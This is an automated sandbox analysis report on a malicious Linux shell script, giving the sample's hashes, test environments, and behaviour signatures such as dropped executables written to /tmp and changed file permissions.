Analysis
-
max time kernel
63s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97